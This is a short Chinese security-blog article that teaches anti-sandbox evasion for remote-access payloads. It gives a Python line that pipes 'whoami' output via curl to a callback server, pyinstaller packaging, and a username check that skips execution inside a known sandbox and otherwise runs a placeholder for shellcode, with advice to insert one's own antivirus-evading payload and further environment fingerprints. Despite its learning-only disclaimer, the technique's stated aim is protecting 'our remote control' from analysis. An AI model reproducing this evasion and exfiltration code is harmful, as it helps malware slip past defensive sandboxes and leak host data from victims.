申明：本次测试只作为学习用处，请勿未授权进行渗透测试，切勿用于其它用途！
公众号现在只对常读和星标的公众号才展示大图推送，
建议大家把 明暗安全
 设为星标，否则可能就看不到啦！

1.漏洞背景

    简单地说，反沙箱技术指的是一种可以检测出虚拟环境的运行软件的技术。虚拟环境是指一种用于模拟真实操作系统的软件环境，软件通常会利用虚拟环境来隐藏自己的真实意图。而反沙箱技术通过识别虚拟环境的特征，从而发现并拦截软件的活动，保护我们的远控。

2.漏洞实例

1. 首先启动我们的反连平台
   

用法在历史文章里，链接如下。

工具 ｜ 无回显变可回显rce

我们用它的作用，是为了接受沙箱运行的反连，用来判断沙箱环境。

2. 制作一个python的exe

关键代码如下：

import os
result = os.system('whoami | curl -X POST -d @- http://ip:8881/')

使用pyinstaller打包为exe,并丢到反沙箱上。

pyinstaller -F ceshi.py

3. 查看反连

发现了一个特征，沙箱的whoami返回值为：

desktop-h9urb7t\administrator

4. 开始编写反沙箱代码。

import subprocess
def get_current_user():    """ 获取当前用户名 """    return subprocess.check_output("whoami").decode().strip()
# 获取当前用户current_user = get_current_user()
# 检查当前用户是否为 'desktop-h9urb7t\administrator'if current_user.lower() == r'desktop-h9urb7t\administrator'.lower():    print("当前用户为 desktop-h9urb7t\administrator，脚本不执行。")else:    print("当前用户不是 desktop-h9urb7t\administrator，可以执行脚本。")    # 在这里添加你想要执行的代码    实际的shellcode

OK，将shellcode替换为自己的免杀。重新丢到沙箱查看。成功bypass沙箱。

原理很简单，就是查看当前运行的环境的whoami值是否为

desktop-h9urb7t\administrator

是就不运行。

思考：

除了whoami，还有其他明显特征吗。

举例：

• %USERNAME% 和 %USERDOMAIN% 环境变量可以提供当前用户名和域名。

• %COMPUTERNAME% 提供当前计算机的名称。

• %OS% 可以告诉你操作系统类型。

• %PROCESSOR_ARCHITECTURE% 提供处理器架构信息（例如x64或x86）。

• 往期精彩推荐
  

❤️爱心三连击

1.本文已收录在明暗官方网站：http://www.php1nf0.top/